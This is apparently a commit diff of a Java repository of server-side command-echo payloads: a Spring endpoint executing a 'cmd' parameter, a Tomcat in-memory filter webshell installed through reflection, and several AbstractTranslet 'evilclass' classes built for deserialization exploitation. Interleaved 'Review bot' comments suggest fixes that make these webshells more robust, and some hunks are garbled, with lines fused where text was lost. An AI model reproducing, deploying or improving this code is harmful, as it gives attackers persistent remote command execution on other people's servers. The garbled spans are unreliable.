+ continue;
+ }
+ String cmd = "readlink " + f3.getPath();
+ BufferedReader br = new BufferedReader(new InputStreamReader(Runtime.getRuntime().exec(new String[]{"/bin/bash", "-c", cmd}).getInputStream()));
+ String line = br.readLine();
+ if (line.contains(inode)) {
+ return f3;
+ }
+ }
+ }
+ }
+
+ return new File(tmp);
+ }
+
+ public static void writeFd(FileDescriptor fd, String body) throws Exception {
+ String response = "HTTP/1.1 200 OK\r\n"
+ + "Content-Type: text/html\r\n"
+ + "Content-Length: " + body.length()
+ + "\r\n\r\n"
+ + body
+ + "\r\n\r\n";
+
+ FileOutputStream os = new FileOutputStream(fd);
+ os.write(response.getBytes());
+ }
+
+ public static String ShellExec(String command) throws IOException {
+
+ List cmds = new ArrayList();
+ cmds.add("/bin/bash");
+ cmds.add("-c");
+ cmds.add(command);
+ ProcessBuilder pb = new ProcessBuilder(cmds);
+ pb.redirectErrorStream(true);
+ Process proc = pb.start();
+
+ byte[] out = new byte[1024 * 10];
+ proc.getInputStream().read(out);
+ return new String(out);
+ }
+
+ public static void say(String cmd) throws Exception {
+ String response = ShellExec(cmd);
+
+ String inode = getInode();
+ File file = getFdFile(inode);
+ FileDescriptor fd = getFd(file);
+ writeFd(fd, response);
+ }
+}
+
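Review bot: `ShellExec` performs a single `proc.getInputStream().read(out)` into a 10 KiB buffer and returns `new String(out)`, so the body is whatever the first pipe read delivered, padded with NUL bytes up to 10240 characters, and longer output is silently cut; `writeFd` then advertises `body.length()` as `Content-Length`, so every reply is a NUL-padded 10240-char blob (and the character count is wrong for multibyte output anyway). Read the stream to EOF and decode with an explicit charset, and size the header from the encoded bytes: `byte[] payload = body.getBytes("UTF-8");` with `"Content-Length: " + payload.length` and `os.write(payload)`. Separately, `getInode` opens a `FileReader` that is never closed and hard-codes the peer-address fragment `1748878`, which the comment itself says is unreliable behind proxies; and the fallback branch of `getFdFile` calls `line.contains(inode)` without checking that `readlink` produced a line, so a vanished fd entry throws NPE out of `say`.
```java
public static String ShellExec(String command) throws IOException {
    // … unchanged: ProcessBuilder setup with redirectErrorStream(true) …
    Process proc = pb.start();
    ByteArrayOutputStream buf = new ByteArrayOutputStream();
    byte[] chunk = new byte[4096];
    int n;
    try (InputStream in = proc.getInputStream()) {
        while ((n = in.read(chunk)) != -1) {
            buf.write(chunk, 0, n);
        }
    }
    return buf.toString("UTF-8");
}
```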
diff --git "a/java\345\233\236\346\230\276/src/main/java/com/firebasky/echo/controller/springmvc.java" "b/java\345\233\236\346\230\276/src/main/java/com/firebasky/echo/controller/springmvc.java"
new file mode 100644
index 0000000..42e7503
--- /dev/null
+++ "b/java\345\233\236\346\230\276/src/main/java/com/firebasky/echo/controller/springmvc.java"
@@ -0,0 +1,37 @@
+package com.firebasky.echo.controller;
+
+import org.springframework.web.bind.annotation.RequestMapping;
+import org.springframework.web.bind.annotation.RestController;
+import org.springframework.web.context.request.RequestContextHolder;
+import org.springframework.web.context.request.ServletRequestAttributes;
+
+import javax.servlet.http.HttpServletRequest;
+import javax.servlet.http.HttpServletResponse;
+import java.io.BufferedReader;
+import java.io.InputStreamReader;
+
+/**
+ * springmvc 利用
+ */
+@RestController
+public class springmvc {
+ @RequestMapping("/springmvc")
+ public void springmvc()throws Exception {
+ HttpServletRequest request =((ServletRequestAttributes) RequestContextHolder.getRequestAttributes()).getRequest();
+ HttpServletResponse response = ((ServletRequestAttributes) RequestContextHolder.getRequestAttributes()).getResponse();
+ String resHeader=request.getParameter ( "cmd" );
+ java.io.InputStream in = java.lang.Runtime.getRuntime().exec(resHeader).getInputStream();
+ BufferedReader br = null;
+ br = new BufferedReader (new InputStreamReader(in, "GBK"));
+ String line;
+ StringBuilder sb = new StringBuilder();
+ while ((line = br.readLine()) != null) {
+ sb.append(line);
+ sb.append("\n");
+ }
+ java.io.PrintWriter out = new java.io.PrintWriter(response.getOutputStream());
+ out.write(sb.toString ());
+ out.flush();
+ out.close();
+ }
+}
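Review bot: `java.lang.Runtime.getRuntime().exec(resHeader)` passes the raw `cmd` parameter as a single String, which the JDK splits on whitespace with a StringTokenizer (no shell, so quotes, pipes and redirects arrive literally), and when the parameter is absent `resHeader` is null and `exec` throws NullPointerException out of the handler; the other controllers in this change go through `sh -c` / `cmd.exe /c`, so either do the same here or guard with `if (resHeader == null) return;`. The output is decoded as `GBK` at the `InputStreamReader` but emitted through `new java.io.PrintWriter(response.getOutputStream())`, which encodes with the platform default and ignores the response's declared encoding, so non-ASCII output is mangled on any host whose default is not GBK. `response.setCharacterEncoding("UTF-8"); java.io.PrintWriter out = response.getWriter();` keeps the two ends consistent, and the decode charset should be chosen to match the shell's output (GBK is typically right only for a Chinese-locale `cmd.exe`).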
diff --git "a/java\345\233\236\346\230\276/src/main/java/com/firebasky/echo/controller/webshell/tomcat.java" "b/java\345\233\236\346\230\276/src/main/java/com/firebasky/echo/controller/webshell/tomcat.java"
new file mode 100644
index 0000000..09b45de
--- /dev/null
+++ "b/java\345\233\236\346\230\276/src/main/java/com/firebasky/echo/controller/webshell/tomcat.java"
@@ -0,0 +1,130 @@
+package com.firebasky.echo.controller.webshell;
+
+import org.springframework.web.bind.annotation.RequestMapping;
+import org.springframework.web.bind.annotation.RestController;
+
+/**
+ * 先访问两次webshell路由(第一次请求修改属性,第二次得到request注册filter)
+ * 然后带上cmd参数访问任意url即可
+ * shiro不成功。。。
+ */
+
+@RestController
+public class tomcat {
+ @RequestMapping("/webshell")
+ public String tomcat() {
+ try{
+ //获取各字段
+ java.lang.reflect.Field WRAP_SAME_OBJECT=Class.forName("org.apache.catalina.core.ApplicationDispatcher").getDeclaredField("WRAP_SAME_OBJECT");
+ Class applicationFilterChain = Class.forName("org.apache.catalina.core.ApplicationFilterChain");
+ java.lang.reflect.Field lastServicedRequest = applicationFilterChain.getDeclaredField("lastServicedRequest");
+ java.lang.reflect.Field lastServicedResponse = applicationFilterChain.getDeclaredField("lastServicedResponse");
+
+ //去掉final修饰符
+ java.lang.reflect.Field modifiers = java.lang.reflect.Field.class.getDeclaredField("modifiers");
+ modifiers.setAccessible(true);
+ modifiers.setInt(WRAP_SAME_OBJECT, WRAP_SAME_OBJECT.getModifiers() & ~java.lang.reflect.Modifier.FINAL);
+ modifiers.setInt(lastServicedRequest, lastServicedRequest.getModifiers() & ~java.lang.reflect.Modifier.FINAL);
+ modifiers.setInt(lastServicedResponse, lastServicedResponse.getModifiers() & ~java.lang.reflect.Modifier.FINAL);
+
+ //设置允许访问
+ WRAP_SAME_OBJECT.setAccessible(true);
+ lastServicedRequest.setAccessible(true);
+ lastServicedResponse.setAccessible(true);
+
+ //如果是第一次请求,则修改各字段,否则获取cmd参数执行命令并返回结果
+ if(!WRAP_SAME_OBJECT.getBoolean(null)){
+ WRAP_SAME_OBJECT.setBoolean(null,true);
+ lastServicedRequest.set(null,new ThreadLocal());
+ lastServicedResponse.set(null,new ThreadLocal());
+ }else{
+ ThreadLocal threadLocalRequest = (ThreadLocal) lastServicedRequest.get(null);
+ javax.servlet.ServletRequest request = threadLocalRequest.get();
+
+ try {
+ javax.servlet.ServletContext servletContext=request.getServletContext();
+
+ //判断是否已有该名字的filter,有则不再添加
+ if (servletContext.getFilterRegistration("webShell") == null) {
+
+ class WebShell implements javax.servlet.Filter{
+
+ public void doFilter(javax.servlet.ServletRequest request, javax.servlet.ServletResponse response, javax.servlet.FilterChain chain) throws java.io.IOException, javax.servlet.ServletException {
+ System.out.println("filter");
+ String cmd=request.getParameter("cmd");
+
+ if(cmd!=null) {
+ String[] cmds = null;
+
+ if (System.getProperty("os.name").toLowerCase().contains("win")) {
+ cmds = new String[]{"cmd.exe", "/c", cmd};
+ } else {
+ cmds = new String[]{"sh", "-c", cmd};
+ }
+
+ java.io.InputStream in = Runtime.getRuntime().exec(cmds).getInputStream();
+ java.util.Scanner s = new java.util.Scanner(in).useDelimiter("\\a");
+ String output = s.hasNext() ? s.next() : "";
+ java.io.Writer writer = response.getWriter();
+ writer.write(output);
+ writer.flush();
+ writer.close();
+ }
+
+ chain.doFilter(request, response);
+ }
+ }
+
+ //因为门面模式的使用,此处servletContext实际是ApplicationContextFacade,需要提取ApplicationContext
+ java.lang.reflect.Field contextField=servletContext.getClass().getDeclaredField("context");
+ contextField.setAccessible(true);
+ org.apache.catalina.core.ApplicationContext applicationContext = (org.apache.catalina.core.ApplicationContext) contextField.get(servletContext);
+
+ //获取ApplicationContext中的StandardContext
+ contextField=applicationContext.getClass().getDeclaredField("context");
+ contextField.setAccessible(true);
+ org.apache.catalina.core.StandardContext standardContext= (org.apache.catalina.core.StandardContext) contextField.get(applicationContext);
+
+ //修改state
+ java.lang.reflect.Field stateField=org.apache.catalina.util.LifecycleBase.class.getDeclaredField("state");
+ stateField.setAccessible(true);
+ stateField.set(standardContext,org.apache.catalina.LifecycleState.STARTING_PREP);
+
+ //注册filter
+ javax.servlet.FilterRegistration.Dynamic filterRegistration = servletContext.addFilter("webShell", new WebShell());
+ filterRegistration.addMappingForUrlPatterns(java.util.EnumSet.of(javax.servlet.DispatcherType.REQUEST), false,new String[]{"/*"});
+
+ //添加到filterConfigs
+ java.lang.reflect.Method filterStartMethod = org.apache.catalina.core.StandardContext.class.getMethod("filterStart");
+ filterStartMethod.setAccessible(true);
+ filterStartMethod.invoke(standardContext, null);
+
+ //调整filter位置
+ org.apache.tomcat.util.descriptor.web.FilterMap[] filterMaps = standardContext.findFilterMaps();
+ for (int i = 0; i < filterMaps.length; i++) {
+ if (filterMaps[i].getFilterName().equalsIgnoreCase("webShell")) {
+ org.apache.tomcat.util.descriptor.web.FilterMap filterMap = filterMaps[i];
+ filterMaps[i] = filterMaps[0];
+ filterMaps[0] = filterMap;
+ break;
+ }
+ }
+
+ //恢复成LifecycleState.STARTE,否则会造成服务不可用
+ stateField.set(standardContext,org.apache.catalina.LifecycleState.STARTED);
+
+ }
+
+ }catch (Exception e){
+ e.printStackTrace();
+ }
+
+ }
+
+ }catch (Exception e){
+ e.printStackTrace();
+ }
+
+ return "test";
+ }
+}
\ No newline at end of file
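Review bot: The `stateField.set(standardContext, org.apache.catalina.LifecycleState.STARTING_PREP)` flip is only reverted at the end of the happy path; if `addFilter`, `addMappingForUrlPatterns` or `filterStart` throws in between, the inner `catch` prints the trace and the context stays in STARTING_PREP, which is exactly the outage the `//恢复成LifecycleState.STARTE` comment warns about. Move the restore into a `finally` so it always runs: `try { /* addFilter, filterStart, filterMap reorder */ } finally { stateField.set(standardContext, org.apache.catalina.LifecycleState.STARTED); }`. The `java.lang.reflect.Field.class.getDeclaredField("modifiers")` trick used to strip `final` from `WRAP_SAME_OBJECT` and the two `lastServiced*` fields is filtered from reflection on JDK 12 and later, so on those runtimes the whole handler fails with NoSuchFieldException before anything is installed; the header comment should state the JDK range this was verified on. Inside `WebShell.doFilter`, `writer.close()` runs before `chain.doFilter(request, response)`, so downstream filters and the servlet then write to a closed writer — return after handling `cmd`, or skip the chain call in that branch.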
diff --git "a/java\345\233\236\346\230\276/src/main/java/com/firebasky/echo/evilclass/springmvc.java" "b/java\345\233\236\346\230\276/src/main/java/com/firebasky/echo/evilclass/springmvc.java"
new file mode 100644
index 0000000..4a6bdf1
--- /dev/null
+++ "b/java\345\233\236\346\230\276/src/main/java/com/firebasky/echo/evilclass/springmvc.java"
@@ -0,0 +1,47 @@
+package com.firebasky.echo.evilclass;
+
+import com.sun.org.apache.xalan.internal.xsltc.DOM;
+import com.sun.org.apache.xalan.internal.xsltc.TransletException;
+import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
+import com.sun.org.apache.xml.internal.dtm.DTMAxisIterator;
+import com.sun.org.apache.xml.internal.serializer.SerializationHandler;
+import org.springframework.web.context.request.RequestContextHolder;
+import org.springframework.web.context.request.ServletRequestAttributes;
+
+import javax.servlet.http.HttpServletRequest;
+import javax.servlet.http.HttpServletResponse;
+import java.io.BufferedReader;
+import java.io.IOException;
+import java.io.InputStreamReader;
+
+public class springmvc extends AbstractTranslet {
+
+ public springmvc() throws IOException {
+ HttpServletRequest request =((ServletRequestAttributes) RequestContextHolder.getRequestAttributes()).getRequest();
+ HttpServletResponse response = ((ServletRequestAttributes) RequestContextHolder.getRequestAttributes()).getResponse();
+ String resHeader=request.getParameter ( "cmd" );
+ java.io.InputStream in = java.lang.Runtime.getRuntime().exec(resHeader).getInputStream();
+ BufferedReader br = null;
+ br = new BufferedReader (new InputStreamReader(in, "GBK"));
+ String line;
+ StringBuilder sb = new StringBuilder();
+ while ((line = br.readLine()) != null) {
+ sb.append(line);
+ sb.append("\n");
+ }
+ java.io.PrintWriter out = new java.io.PrintWriter(response.getOutputStream());
+ out.write(sb.toString ());
+ out.flush();
+ out.close();
+ }
+
+ @Override
+ public void transform(DOM document, SerializationHandler[] handlers) throws TransletException {
+
+ }
+
+ @Override
+ public void transform(DOM document, DTMAxisIterator iterator, SerializationHandler handler) throws TransletException {
+
+ }
+}
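Review bot: `RequestContextHolder.getRequestAttributes()` returns null on any thread that is not bound to a DispatcherServlet request, and the constructor casts and dereferences it immediately, so when this translet is instantiated from a non-request thread (or after the attributes were reset) the NullPointerException escapes the constructor; a guard like `if (!(RequestContextHolder.getRequestAttributes() instanceof ServletRequestAttributes)) return;` at the top lets it degrade quietly instead. The body is a copy of the `controller/springmvc` handler and carries the same issues: `exec(resHeader)` with a raw String (whitespace-tokenised, no shell, NPE when `cmd` is absent) and output decoded as `GBK` but written through a `PrintWriter` on `response.getOutputStream()` that encodes with the platform default, so `response.setCharacterEncoding("UTF-8")` plus `response.getWriter()` is the consistent pair here too. JDK types are referenced fully-qualified while Spring types are imported, which suggests the class is meant to be loaded as raw bytes where only the JDK is guaranteed — if so, a class comment stating that constraint would stop the next edit from adding an import.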
diff --git "a/java\345\233\236\346\230\276/src/main/java/com/firebasky/echo/evilclass/tomcat72.java" "b/java\345\233\236\346\230\276/src/main/java/com/firebasky/echo/evilclass/tomcat72.java"
new file mode 100644
index 0000000..e916d20
--- /dev/null
+++ "b/java\345\233\236\346\230\276/src/main/java/com/firebasky/echo/evilclass/tomcat72.java"
@@ -0,0 +1,91 @@
+package com.firebasky.echo.evilclass;
+
+
+import com.sun.org.apache.xalan.internal.xsltc.DOM;
+import com.sun.org.apache.xalan.internal.xsltc.TransletException;
+import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
+import com.sun.org.apache.xml.internal.dtm.DTMAxisIterator;
+import com.sun.org.apache.xml.internal.serializer.SerializationHandler;
+import org.apache.coyote.Request;
+import org.apache.tomcat.util.buf.ByteChunk;
+import org.apache.tomcat.util.modeler.Registry;
+
+import javax.management.MBeanServer;
+import java.io.InputStream;
+import java.lang.reflect.Field;
+import java.util.ArrayList;
+import java.util.HashMap;
+import java.util.Scanner;
+
+public class tomcat72 extends AbstractTranslet {
+ public tomcat72(){
+ try{
+
+ MBeanServer mbeanServer = Registry.getRegistry((Object)null, (Object)null).getMBeanServer();
+ Field field = Class.forName("com.sun.jmx.mbeanserver.JmxMBeanServer").getDeclaredField("mbsInterceptor");
+ field.setAccessible(true);
+ Object obj = field.get(mbeanServer);
+
+ field = Class.forName("com.sun.jmx.interceptor.DefaultMBeanServerInterceptor").getDeclaredField("repository");
+ field.setAccessible(true);
+ obj = field.get(obj);
+
+ field = Class.forName("com.sun.jmx.mbeanserver.Repository").getDeclaredField("domainTb");
+ field.setAccessible(true);
+ HashMap obj2 = (HashMap)field.get(obj);
+ obj = ((HashMap)obj2.get("Catalina")).get("name=\"http-bio-8888\",type=GlobalRequestProcessor");
+
+ field = Class.forName("com.sun.jmx.mbeanserver.NamedObject").getDeclaredField("object");
+ field.setAccessible(true);
+ obj = field.get(obj);
+
+ field = Class.forName("org.apache.tomcat.util.modeler.BaseModelMBean").getDeclaredField("resource");
+ field.setAccessible(true);
+ obj = field.get(obj);
+
+ field = Class.forName("org.apache.coyote.RequestGroupInfo").getDeclaredField("processors");
+ field.setAccessible(true);
+ ArrayList obj3 = (ArrayList)field.get(obj);
+
+ field = Class.forName("org.apache.coyote.RequestInfo").getDeclaredField("req");
+ field.setAccessible(true);
+
+ boolean isLinux = true;
+ String osTyp = System.getProperty("os.name");
+ if (osTyp != null && osTyp.toLowerCase().contains("win")) {
+ isLinux = false;
+ }
+
+ for (int i = 0; i < obj3.size(); i++) {
+ Request obj4 = (Request) field.get(obj3.get(i));
+ String username = obj4.getParameters().getParameter("username");
+ if(username != null){
+ String[] cmds = isLinux ? new String[]{"sh", "-c", username} : new String[]{"cmd.exe", "/c", username};
+ InputStream in = Runtime.getRuntime().exec(cmds).getInputStream();
+ Scanner s = new Scanner(in).useDelimiter("\\a");
+ String output = "";
+ while (s.hasNext()){
+ output += s.next();
+ }
+
+ byte[] buf = output.getBytes();
+ ByteChunk bc = new ByteChunk();
+ bc.setBytes(buf, 0, buf.length);
+ obj4.getResponse().doWrite(bc);
+ break;
+ }
+ }
+ } catch (Exception e) {
+// System.out.println("=======================");
+// System.out.println(e);
+ }
+ }
+
+ public void transform(DOM document, SerializationHandler[] handlers) throws TransletException {
+
+ }
+
+ public void transform(DOM document, DTMAxisIterator iterator, SerializationHandler handler) throws TransletException {
+
+ }
+}
\ No newline at end of file
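Review bot: The `for` loop over `RequestGroupInfo.processors` walks every worker's `RequestInfo` on the `http-bio-8888` connector rather than the request this thread is serving, and writes the command output into the first in-flight request carrying a `username` parameter; under concurrent traffic that can run the command on behalf of, and answer into, another client's connection. `RequestInfo` exposes the worker thread name in the Tomcat versions I know, so comparing it with `Thread.currentThread().getName()` before reading parameters would pin the write to the current request — hedged, since that accessor is not visible in this hunk. The `catch (Exception e)` with its commented-out prints swallows every failure, including the NullPointerException from `((HashMap)obj2.get("Catalina")).get(...)` when the connector name or port differs; at minimum `e.printStackTrace()` so a failed lookup is distinguishable from a silent success. The MBean key `name=\"http-bio-8888\",type=GlobalRequestProcessor` hard-codes both the BIO protocol and port 8888, tying the class to one lab connector; say so in a comment, or scan the `Catalina` domain map for a key starting with `name=\"http-`.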
diff --git "a/java\345\233\236\346\230\276/src/main/java/com/firebasky/echo/evilclass/tomcat82.java" "b/java\345\233\236\346\230\276/src/main/java/com/firebasky/echo/evilclass/tomcat82.java"
new file mode 100644
index 0000000..1b898dc
--- /dev/null
+++ "b/java\345\233\236\346\230\276/src/main/java/com/firebasky/echo/evilclass/tomcat82.java"
@@ -0,0 +1,86 @@
+package com.firebasky.echo.evilclass;
+
+import com.sun.org.apache.xalan.internal.xsltc.DOM;
+import com.sun.org.apache.xalan.internal.xsltc.TransletException;
+import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
+import com.sun.org.apache.xml.internal.dtm.DTMAxisIterator;
+import com.sun.org.apache.xml.internal.serializer.SerializationHandler;
+import org.apache.coyote.Request;
+import org.apache.tomcat.util.buf.ByteChunk;
+import org.apache.tomcat.util.modeler.Registry;
+import javax.management.MBeanServer;
+import java.io.InputStream;
+import java.lang.reflect.Field;
+import java.util.ArrayList;
+import java.util.HashMap;
+import java.util.Scanner;
+
+public class tomcat82 extends AbstractTranslet {
+ public tomcat82() {
+ try{
+ MBeanServer mbeanServer = Registry.getRegistry((Object)null, (Object)null).getMBeanServer();
+ Field field = Class.forName("com.sun.jmx.mbeanserver.JmxMBeanServer").getDeclaredField("mbsInterceptor");
+ field.setAccessible(true);
+ Object obj = field.get(mbeanServer);
+
+ field = Class.forName("com.sun.jmx.interceptor.DefaultMBeanServerInterceptor").getDeclaredField("repository");
+ field.setAccessible(true);
+ obj = field.get(obj);
+
+ field = Class.forName("com.sun.jmx.mbeanserver.Repository").getDeclaredField("domainTb");
+ field.setAccessible(true);
+ HashMap obj2 = (HashMap)field.get(obj);
+ obj = ((HashMap)obj2.get("Catalina")).get("name=\"http-nio-8888\",type=GlobalRequestProcessor");
+
+ field = Class.forName("com.sun.jmx.mbeanserver.NamedObject").getDeclaredField("object");
+ field.setAccessible(true);
+ obj = field.get(obj);
+
+ field = Class.forName("org.apache.tomcat.util.modeler.BaseModelMBean").getDeclaredField("resource");
+ field.setAccessible(true);
+ obj = field.get(obj);
+
+ field = Class.forName("org.apache.coyote.RequestGroupInfo").getDeclaredField("processors");
+ field.setAccessible(true);
+ ArrayList obj3 = (ArrayList)field.get(obj);
+
+ field = Class.forName("org.apache.coyote.RequestInfo").getDeclaredField("req");
+ field.setAccessible(true);
+
+ boolean isLinux = true;
+ String osTyp = System.getProperty("os.name");
+ if (osTyp != null && osTyp.toLowerCase().contains("win")) {
+ isLinux = false;
+ }
+
+ for (int i = 0; i < obj3.size(); i++) {
+ Request obj4 = (Request) field.get(obj3.get(i));
+ String username = obj4.getParameters().getParameter("cmd");
+ if(username != null){
+ String[] cmds = isLinux ? new String[]{"sh", "-c", username} : new String[]{"cmd.exe", "/c", username};
+ InputStream in = Runtime.getRuntime().exec(cmds).getInputStream();
+ Scanner s = new Scanner(in).useDelimiter("\\a");
+ String output = "";
+ while (s.hasNext()){
+ output += s.next();
+ }
+
+ byte[] buf = output.getBytes();
+ ByteChunk bc = new ByteChunk();
+ bc.setBytes(buf, 0, buf.length);
+ obj4.getResponse().doWrite(bc);
+ break;
+ }
+ }
+
+ } catch (Exception e){
+ }
+ }
+ public void transform(DOM document, SerializationHandler[] handlers) throws TransletException {
+
+ }
+
+ public void transform(DOM document, DTMAxisIterator iterator, SerializationHandler handler) throws TransletException {
+
+ }
+}
\ No newline at end of file
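Review bot: `String username = obj4.getParameters().getParameter("cmd");` keeps the `username` name from the `tomcat72` copy while now reading `cmd`, so the variable no longer says what it holds; rename it `cmd`. The MBean key `name=\"http-nio-8888\",type=GlobalRequestProcessor` hard-codes protocol and port, and for any other connector `((HashMap)obj2.get("Catalina")).get(...)` returns null, after which `field.get(obj)` throws NullPointerException into an empty `catch (Exception e){}` — nothing is logged, so a wrong port is indistinguishable from success; put at least `e.printStackTrace()` there, and iterating the domain map for a key starting with `name=\"http-` would remove the port dependency. As in `tomcat72`, the `processors` loop matches any in-flight request with a `cmd` parameter rather than the current thread's, so the output may be written into another client's response.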
diff --git "a/java\345\233\236\346\230\276/src/main/java/com/firebasky/echo/evilclass/tomcat_v1.java" "b/java\345\233\236\346\230\276/src/main/java/com/firebasky/echo/evilclass/tomcat_v1.java"
new file mode 100644
index 0000000..675b292
--- /dev/null
+++ "b/java\345\233\236\346\230\276/src/main/java/com/firebasky/echo/evilclass/tomcat_v1.java"
@@ -0,0 +1,98 @@
+package com.firebasky.echo.evilclass;
+
+import com.sun.org.apache.xalan.internal.xsltc.DOM;
+import com.sun.org.apache.xalan.internal.xsltc.TransletException;
+import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
+import com.sun.org.apache.xml.internal.dtm.DTMAxisIterator;
+import com.sun.org.apache.xml.internal.serializer.SerializationHandler;
+/**
+ * 基于全局储存获取Tomcat Response
+ *
+ * ?cmd=whoami
+ *
+ * shiro可以使用,tomcat 7好像不行,并且限制了max header
+ */
+public class tomcat_v1 extends AbstractTranslet {
+ public tomcat_v1() {
+ try{
+ //传递命令的参数名
+ String pass="cmd";
+ //WebappClassLoaderBase
+ org.apache.catalina.loader.WebappClassLoaderBase webappClassLoaderBase = (org.apache.catalina.loader.WebappClassLoaderBase) Thread.currentThread().getContextClassLoader();
+
+ //ApplicationContext
+ org.apache.catalina.Context context=webappClassLoaderBase.getResources().getContext();
+ java.lang.reflect.Field contextField = org.apache.catalina.core.StandardContext.class.getDeclaredField("context");
+ contextField.setAccessible(true);
+ org.apache.catalina.core.ApplicationContext applicationContext = (org.apache.catalina.core.ApplicationContext) contextField.get(context);
+
+ //StandardService
+ java.lang.reflect.Field serviceField = org.apache.catalina.core.ApplicationContext.class.getDeclaredField("service");
+ serviceField.setAccessible(true);
+ org.apache.catalina.core.StandardService standardService = (org.apache.catalina.core.StandardService) serviceField.get(applicationContext);
+
+ //Connector
+ org.apache.catalina.connector.Connector connectors[]=standardService.findConnectors();
+
+ //筛选Connector
+ for (int i=0;i threadLocalRequest = (ThreadLocal) lastServicedRequest.get(null);
+ ThreadLocal threadLocalResponse = (ThreadLocal) lastServicedResponse.get(null);
+ javax.servlet.ServletRequest request = threadLocalRequest.get();
+ javax.servlet.ServletResponse response = threadLocalResponse.get();
+
+ String cmd=request.getParameter("cmd");
+
+ if(cmd!=null){
+ String[] cmds=null;
+
+ if(System.getProperty("os.name").toLowerCase().contains("win")){
+ cmds=new String[]{"cmd.exe", "/c", cmd};
+ }else{
+ cmds=new String[]{"/bin/bash", "-c", cmd};
+ }
+
+ java.io.InputStream in = Runtime.getRuntime().exec(cmds).getInputStream();
+ java.util.Scanner s = new java.util.Scanner(in).useDelimiter("\\a");
+ String output = s.hasNext() ? s.next() : "";
+
+ java.io.Writer writer = response.getWriter();
+ //目前得到的response是org.apache.catalina.connector.ResponseFacade,其封装了org.apache.catalina.connector.Response,要修改的usingWriter字段在后者中
+ java.lang.reflect.Field r=response.getClass().getDeclaredField("response");
+ r.setAccessible(true);
+ java.lang.reflect.Field usingWriter = Class.forName("org.apache.catalina.connector.Response").getDeclaredField("usingWriter");
+ usingWriter.setAccessible(true);
+ usingWriter.set(r.get(response), Boolean.FALSE);
+ //解决报错。。
+ writer.write(output);
+ writer.flush();
+ writer.close();
+ }
+ }
+
+ }catch (Exception e){
+ e.printStackTrace();
+ }
+ }
+
+ @Override
+ public void transform(DOM document, SerializationHandler[] handlers) throws TransletException {
+
+ }
+
+ @Override
+ public void transform(DOM document, DTMAxisIterator iterator, SerializationHandler handler) throws TransletException {
+
+ }
+}
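Review bot: The hunk as shown does not compile: the line `for (int i=0;i threadLocalRequest = (ThreadLocal) lastServicedRequest.get(null);` fuses a loop header with a later assignment, and the declarations of `lastServicedRequest`/`lastServicedResponse` that it reads are absent, which looks like angle-bracket text (a `<` comparison and `ThreadLocal<...>` generics) lost in extraction rather than a defect in the committed file; the `for` line of `tomcat_v3` in the next hunk is truncated the same way. Anyone reading this listing should treat that span as unrecoverable from the page rather than infer what stood there. The class Javadoc names only the parameter and a Shiro/Tomcat 7 caveat; it should also state that all work happens in the constructor and that both `transform` overrides are intentionally empty stubs, e.g. `Constructor does the work; transform() methods are no-op stubs required by AbstractTranslet.`. The class name `tomcat_v1` also departs from the UpperCamelCase used elsewhere in this commit (`EchoApplicationTests`).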
diff --git "a/java\345\233\236\346\230\276/src/main/java/com/firebasky/echo/evilclass/tomcat_v3.java" "b/java\345\233\236\346\230\276/src/main/java/com/firebasky/echo/evilclass/tomcat_v3.java"
new file mode 100644
index 0000000..0c11e75
--- /dev/null
+++ "b/java\345\233\236\346\230\276/src/main/java/com/firebasky/echo/evilclass/tomcat_v3.java"
@@ -0,0 +1,77 @@
+package com.firebasky.echo.evilclass;
+
+import com.sun.org.apache.xalan.internal.xsltc.DOM;
+import com.sun.org.apache.xalan.internal.xsltc.TransletException;
+import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
+import com.sun.org.apache.xml.internal.dtm.DTMAxisIterator;
+import com.sun.org.apache.xml.internal.serializer.SerializationHandler;
+
+/**
+ * header cmd=whoami
+ */
+public class tomcat_v3 extends AbstractTranslet {
+ public tomcat_v3() {
+ try {
+ java.lang.reflect.Field contextField = org.apache.catalina.core.StandardContext.class.getDeclaredField("context");
+ java.lang.reflect.Field serviceField = org.apache.catalina.core.ApplicationContext.class.getDeclaredField("service");
+ java.lang.reflect.Field requestField = org.apache.coyote.RequestInfo.class.getDeclaredField("req");
+ java.lang.reflect.Method getHandlerMethod = org.apache.coyote.AbstractProtocol.class.getDeclaredMethod("getHandler",null);
+ contextField.setAccessible(true);
+ serviceField.setAccessible(true);
+ requestField.setAccessible(true);
+ getHandlerMethod.setAccessible(true);
+ org.apache.catalina.loader.WebappClassLoaderBase webappClassLoaderBase =
+ (org.apache.catalina.loader.WebappClassLoaderBase) Thread.currentThread().getContextClassLoader();
+ org.apache.catalina.core.ApplicationContext applicationContext = (org.apache.catalina.core.ApplicationContext) contextField.get(webappClassLoaderBase.getResources().getContext());
+ org.apache.catalina.core.StandardService standardService = (org.apache.catalina.core.StandardService) serviceField.get(applicationContext);
+ org.apache.catalina.connector.Connector[] connectors = standardService.findConnectors();
+ for (int i=0;i threadLocalRequest = (ThreadLocal) lastServicedRequest.get(null);
+ javax.servlet.ServletRequest request = threadLocalRequest.get();
+
+ try {
+ javax.servlet.ServletContext servletContext=request.getServletContext();
+
+ //判断是否已有该名字的filter,有则不再添加
+ if (servletContext.getFilterRegistration("webShell") == null) {
+
+ class WebShell implements javax.servlet.Filter{
+
+ public void doFilter(javax.servlet.ServletRequest request, javax.servlet.ServletResponse response, javax.servlet.FilterChain chain) throws java.io.IOException, javax.servlet.ServletException {
+ System.out.println("filter");
+ String cmd=request.getParameter("cmd");
+
+ if(cmd!=null) {
+ String[] cmds = null;
+
+ if (System.getProperty("os.name").toLowerCase().contains("win")) {
+ cmds = new String[]{"cmd.exe", "/c", cmd};
+ } else {
+ cmds = new String[]{"sh", "-c", cmd};
+ }
+
+ java.io.InputStream in = Runtime.getRuntime().exec(cmds).getInputStream();
+ java.util.Scanner s = new java.util.Scanner(in).useDelimiter("\\a");
+ String output = s.hasNext() ? s.next() : "";
+ java.io.Writer writer = response.getWriter();
+ writer.write(output);
+ writer.flush();
+ writer.close();
+ }
+
+ chain.doFilter(request, response);
+ }
+ }
+
+ //因为门面模式的使用,此处servletContext实际是ApplicationContextFacade,需要提取ApplicationContext
+ java.lang.reflect.Field contextField=servletContext.getClass().getDeclaredField("context");
+ contextField.setAccessible(true);
+ org.apache.catalina.core.ApplicationContext applicationContext = (org.apache.catalina.core.ApplicationContext) contextField.get(servletContext);
+
+ //获取ApplicationContext中的StandardContext
+ contextField=applicationContext.getClass().getDeclaredField("context");
+ contextField.setAccessible(true);
